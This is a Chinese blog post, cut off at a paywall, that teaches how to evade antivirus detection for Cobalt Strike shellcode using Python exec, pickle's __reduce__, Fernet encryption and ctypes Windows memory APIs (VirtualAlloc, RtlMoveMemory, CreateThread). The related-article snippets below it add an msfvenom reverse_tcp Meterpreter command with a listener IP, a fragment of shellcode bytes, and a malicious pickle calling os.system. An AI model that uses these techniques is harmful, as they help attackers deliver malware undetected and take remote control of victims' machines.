木马免杀代码之python反序列化分离免杀

已于 2024-04-15 10:53:43 修改
阅读量1.2k 收藏 34
点赞数 31
文章标签: java 网络 linux 计算机攻防 网络安全
于 2024-04-15 10:53:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zxj19880502/article/details/137772538
版权

本篇文章主要用到python来对CobaltStrike生成的Shellcode进行分离免杀处理, 因此要求读者要有一定的python基础, 下面我会介绍pyhon反序列化免杀所需用到的相关函数和库

exec函数

exec函数是python的内置函数, 其功能与eval()函数相同, 但不同的是exec函数支持多行python代码的执行, 而eval()函数仅支持单行

exec("""String = "HelloWorld"
print(String)""") 

#在上述的exec执行的python代码中定义了String变量,因此能进行输出
print(String) 

'''
代码执行结果:
HelloWorld
HelloWorld
'''

pickle模块

pickle模块能实现任意对象与文本之间的相互转换, 也可实现任意对象和二进制之间的相互转换, 也就是说pickle能实现python对象的存储及恢复

python中几乎所有的数据类型(列表,字典,集合,类等等)都可以用pickle来序列化, 序列化的数据可读性差且难识别, 通常用于存储数据

pickle.dumps(obj)

dumps功能将数据转换成只有python语言认识的字符串

  • 参数obj: 要封装的对象
import pickle
data = ['henry','helloworld',123]
p_str = pickle.dumps(data)
print(p_str)
#输出b'\x80\x04\x95\x1c\x00\x00\x00\x00\x00\x00\x00]\x94(\x8c\x05henry\x94\x8c\nhelloworld\x94K{e.'

pickle.loads(bytes_obj)

loads功能将pickle数据转换成python的数据结构

  • 参数bytes_obj: pickle_dumps后的数据对象
import pickle
data = ['henry','helloworld',123]
p_str = pickle.dumps(data)
print(p_str)

str = pickle.loads(p_str)
print(str)
#输出:['henry', 'helloworld', 123]

pickle.dump(obj,file,[protocol])

序列化对象, 并将结果数据流写入文件file中

  • 必填参数obj: 将要封装的对象

  • 必填参数file: 要写入的文件对象, file必须以二进制模式打开

  • 参数protocol: 代表序列化模式, 默认值为0, 表示以文本的形式进行序列化, protocol的值为1或2时表示以二进制的形式序列化

import pickle
data = ['henry','helloworld',123]

with open('dump.txt','wb') as file:
    pickle.dump(data,file)

with open('dump.txt','rb') as file:
    print(file.read()) #输出:b'\x80\x04\x95\x1c\x00\x00\x00\x00\x00\x00\x00]\x94(\x8c\x05henry\x94\x8c\nhelloworld\x94K{e.'

pickle.load(file)

反序列化对象, 将文件中的数据解析为一个python对象

  • 必填参数file: 存有pickle数据的文件对象
import pickle
data = ['henry','helloworld',123]

with open('dump.txt','wb') as file:
    pickle.dump(data,file)

with open('dump.txt','rb') as file:
    print(pickle.load(file)) #输出:['henry', 'helloworld', 123]

类特殊方法:__reduce__

当定义扩展类型时(即使用python的C语言API实现的类型), 若你想pickle这些类型, 你必须告诉python如何去pickle

__reduce__方法在类中被定义后, 当对象被pickle时就会被调用, 它要么返回一个代表全局名称的字符串, python会查找此字符串并pickle; 要么返回一个元组, 此元组包含2到5个元素, 第一个元素为可调用的对象, 用于重建对象时调用; 第二个元素是参数元素(必须为元组), 供可调用对象(第一个元素)使用; 另外三个元素分别是: 被传递给__setstate__的状态(可选)、一个产生被pickle的列表元素的迭代器(可选)、一个产生被pickle的字典元素的迭代器(可选)

import pickle
shellcode = "list1 = [1,2,3,4]"

class A(object):
   def __reduce__(self):
       return (exec,(shellcode,))

#当实例对象被pickle后,则会调用特殊方法__reduce__,所以下列代码相当于pickle.dumps((exec,(shellcode,)))
ret = pickle.dumps(A())

print(ret)
#输出:b'\x80\x04\x95-\x00\x00\x00\x00\x00\x00\x00\x8c\x08builtins\x94\x8c\x04exec\x94\x93\x94\x8c\x11list1 = [1,2,3,4]\x94\x85\x94R\x94.'

Cryptography

简介

Cryptography是python语言中非常著名的加解密库,在算法层面提供了高层次的抽象,使用起来非常简单、直观,同时还保留了各种不同算法的低级别接口,保留灵活性

我们知道加密一般分为对称加密(Symmetric Key Encryption)和非对称加密(Asymmetric Key Encryption)。各自对应多种不同的算法,每种算法又有不同的密钥位长要求,另外还涉及到不同的分组加密模式,以及末尾补齐方式。因此需要高层次的抽象,把这些参数封装起来,让我们使用时,不用关心这么多参数,只要知道这么用足够安全就够了

对称加密又分为分组加密和序列加密,本文只讨论对称分组加密

  • 主流对称分组加密算法:DES、3DES、AES
  • 主流对称分组加密模式:ECB、CBC、CFB、OFB
  • 主流填充标准:PKCS7、ISO 10126、ANSI X.923、Zero padding

在cryptography库中,对称加密算法的抽象是fernet模块,包括了对数据的加解密以及签名验证功能,以及密钥过期机制,该模块采用了如下定义:

  • 加解密算法为AES,密钥位长128,CBC模式,填充标准PKCS7
  • 签名算法为SHA256的HMAC,密钥位长128位
  • 密钥可以设置过期时间

使用实例

from cryptography.fernet import Fernet

String = b"Hello World"

#生成密钥
key = Fernet.generate_key()
print(key) #输出key: b'wmCNyvzUekp_JWEHUcTy4vS2qMrWDXbKOfTooYD1WiI='
f_obj = Fernet(key) #定义一个用于实现加密和解密方法的对象

#进行加密
encrypt_String = f_obj.encrypt(String)
print(encrypt_String) #输出加密后的内容: b'gAAAAABjetNK7sjOoosLI-KcPGdwvQQJVnhwYR9JIeGUx3hJ3qKOQXkaKiGgrlj8wr-tMZdhFKcoK75oONPP4rEDVna5cITQ9g=='

#进行解密
decrypt_String = f_obj.decrypt(encrypt_String)
print(decrypt_String) #输出解密后的内容: b'Hello World'

Ctypes库

Ctypes 是 Python 的外部函数库。提供了与 C 兼容的数据类型,并允许调用 DLL 或共享库中的函数。可使用该模块以纯 Python 形式对这些库进行封装

而本编文章主要调用系统DLL的函数有VirtualAllocRtlMoveMemoryCreateThreadWaitForSingleObject, 这些函数后文都会讲述

ShellCode加载器

实现思路

要实现所谓的Shellcode加载器, 其实只需以下四个步骤:

  • VirtualAlloc函数开辟内存空间
  • RtlMoveMemory
最低0.47元/天 解锁文章
分离python
zhangshuaiijie的博客
06-28 850
shellcode是一段用于利用软件漏洞的有效负载代码,以其经常让攻击者获得shell而得名shellcode loader加载器是用来运行shellcode的加载器,用什么语言来写都可以思路就是将shellcode和loader分离开来,用loader加载存在于普通文件中的shellcode。
Python远程加载分离反序列化
qq_43606723的博客
08-15 1865
shellcode.py远程加载反序列化手法
对抗—python&混淆算法&反序列化&shellcode
2301_76227305的博客
09-23 1216
上面的测试可以看到想实现真正的还是比较难的,因为上面我们使用的加密方式都是公开的,公开的东西想要实现基本是很难的,或者说时效性短,可能这个公开的脚步今天能成功,明天就不行了。除非是自己写的加密脚本,或者自己创造一个加密算法,这样子的效果就会比较好。而且我们上面加载器,使用的分配内存用的VirtualAlloc 函数,早已经被国内几大厂商监控烂了,想要加强效果只能用一下比较冷门的函数了。
内网渗透-网络分离
最新发布
zj2084的博客
03-27 315
但是360扫出来了,是因为我们那个python代码中有注释代码,说不定注释代码的里面就有一些木马的特征,然后被360发现,所以才扫出来了,我们将注释过的代码全部删除,发现360无法扫描出来。在本地用火绒扫描一下,发现成功达到的效果,因为我们的python代码只有5行,没有任何的木马特征,所以应该是无法扫出来的。我们先在根目录下创建一个名为payload.txt的文件,将我们的paylaod放入进去,记住是双引号里面的数据,不加双引号。网络分离,既然已经分离了,所以加不加密原则上是无所谓的。
Python木马分离(下载分离型)
lunito的博客
04-27 1202
msf生成python的shellcode木马简单分离思路
Python反序列化上线CS:两次编码绕过
Miracle_ze的博客
08-21 2330
如果在测试中出现crypto问题,是因为在使用python是经常会用到import一个第三方库,但是有时候会提示某个模块不存在,如Crypto其实是因为Python3里面这个模块的名字变了。这里的编码是我们上传了服务器已经编码过一次的内容进行了的反序列化,对反序列化后的内再次base64编码。编码base64编码 =》aes 加密 =》base64编码 加密1次 解密1次。此时加密后输入的加密格式是base64格式,为此要解密前需要先base64解密再进行AES解密。在文件内容加入反序列化结果。
python序列化和反序列化_python反序列化
weixin_39789042的博客
01-31 706
在日常的渗透行动当中,当我们对目标进行内网横向渗透时很不幸的是内网一般往往都会部署防火墙、流量监控等设备,软更是成为了服务器的标配,所以如何进行绕过毒软件的限制让主机上线成了我们首要解决的问题之一下面使用python反序列化进行这是python原始shellcode加载方式importctypesshellcode=b"\xfc\x48\x83\xe4\xf0\xe8....
web漏洞之中间介漏洞
小白的博客
05-08 714
IIS 解析漏洞 IIS6.x 基于文件名 将 *.asp;.jpg 此种格式的文件名,当成asp解析, 原理:服务器默认不解析; 号及其后面的内容,相当于截断。 基于文件夹名 将 *.asp/目录下的所有文件当成asp解析 其他 默认会将扩展名为.asa,.cdx,.cer解析为asp 漏洞修复 限制上传目录执行权限,不允许执行脚本 不允许新建目录。 上传的文件需经过重命名(时间戳+随机数+.jpg等) IIS7.x 漏洞描述 CGI运行模式 CGI即通用网关接口(Common Gat
万字渗透测试入门知识点,自学查漏补缺
yjwangan的博客
10-24 1248
万字渗透测试入门知识点,自学查漏补缺
常见漏洞知识库(原理/场景/修复)
lefooter的博客
04-30 6362
SQL 注入 0x01 漏洞描述 SQL注入漏洞产生的原因是网站应用程序在编写时未对用户提交至服务器的数据进行合法性校验(类型、长度、业务参数合法性等),同时没有对用户输入数据进行有效地特殊字符过滤,使得用户的输入直接带入数据库执行,超出了SQL语句原来设计的预期结果,导致了SQL注入漏洞。 0x02 常见应用场景 SQL注入漏洞可能出现在一切与数据库交互的地方,比如常见的查询用户信息、查询订单信...
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 1499
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
通过Python实现Payload分离过程详解
09-16
主要介绍了通过Python实现Payload分离过程详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Python反序列化上线CS
qq_57686163的博客
08-20 985
简单上线cs
python类加载器_利用Python反序列化运行加载器实现
weixin_36266554的博客
02-04 594
前言前几天在看Python的shellcode加载器,在网上找了一个,结果加载器自身就过不了火绒,测试发现是火绒对关键语句进行了识别。 所以我们要想办法去掉加载器中明显的特征。原理及实现在绕过静态查方面,主要就是要隐藏特征,比较常见的就是各种混淆、加密,但加密后的代码到最终还是需要去执行它才行,代码执行这一个操作其实特征也是很明显的,像exec、eval、os.system、subprocess...
【渗透测试笔记】之【Python——两行代码。VT查率:10/68(思路:将ShellCode和Loader一起分离)】
AA8j的博客
10-24 6128
文章目录1. shellcode Loader1.1 生成shellcode1.2 shellcode loader 脚本上线测试1.3 使用pyinstaller生成exe文件上线测试1.4 VT查率:24/682. ShellCode 分离2.1 上传加密后的shellcode2.2 改写shellcode loader2.3 shellcode 分离后shellcode loader脚本上线测试2.4 shellcode 分离后,使用pyinstaller生成exe文件上线测试2.5 VT查率:1
python 生成payload_利用Python进行Payload分离
weixin_29300241的博客
02-09 319
缺点:编译成exe以后体积过大实现:msf生成shellcode代码:msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.3.60 LPORT=3333 -f c将payload给copy下来,去除引号。\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\...
Python编写简易木马程序
记录,总结,成长
01-28 9549
Python编写简易木马程序 0x00 准备 文章内容仅供学习研究、切勿用于非法用途! 这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里: http://drops.wooyun.org/tips/4413
对抗—python&分离&无文件落地&图片隐写&SOCK管道
2301_76227305的博客
10-10 1530
今天主要是这个分离,其实思路是很不错的,至于脚本那些,可以自己改进,或者说换个其他的语言来实现。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
Python反序列化漏洞
03-25
### Python反序列化漏洞概述 Python中的反序列化漏洞通常涉及`pickle`模块或其他类似的库,这些工具允许对象被序列化成字节流以便存储或传输,并能够将其重新转换回原始的对象状态。然而,在此过程中如果输入数据未经过适当验证,则可能导致恶意代码执行。 #### 1. Python反序列化漏洞原理 当程序使用像`pickle`这样的机制来保存和恢复复杂的数据结构时,它实际上是在创建一种可以描述如何重建该对象的指令集[^2]。攻击者可能通过篡改这个过程所使用的数据,使得目标应用在尝试解码时运行任意命令。这是因为某些类型的对象在其初始化或者操作期间会触发特定的行为——比如调用函数、访问文件系统等等。 ```python import pickle class EvilPickle(object): def __reduce__(self): import os return (os.system, ('echo "This is an example of a malicious command"',)) def serialize_exploit(): evil_pickle = EvilPickle() serialized_data = pickle.dumps(evil_pickle) return serialized_data serialized_payload = serialize_exploit() # This would execute the malicious code when deserialized. deserialized_object = pickle.loads(serialized_payload) ``` 上述代码展示了如何构建一个简单的payload,一旦被加载就会打印一条消息到终端上作为演示用途[^3]。 #### 2. 利用方式 为了成功利用此类漏洞,黑客需要找到应用程序接受外部可控参数并对其进行 unpickling 的地方。这可以通过分析源代码、测试API端点等方式实现。之后他们就可以发送特制的有效载荷给服务器或者其他受影响的服务实例,从而达成远程代码执行的目的。 #### 3. 防护措施 针对这种威胁有几种有效的缓解策略: - **避不必要的功能**:除非绝对必要,否则不应启用任何形式的自动unpickler服务接口面向公网开放。 - **白名单控制**:仅限于信任来源提交的内容才能参与反序列化进程;对于不可信渠道传来的资料一律拒绝处理。 - **安全替代方案的选择**:考虑采用更安全的消息传递格式如JSON/XML等代替原生二进制编码形式来进行跨进程通信任务[^4]。 另外值得注意的是定期更新依赖项以及遵循最小权限原则也是减少风险的重要组成部分之一。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

zxj19880502

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值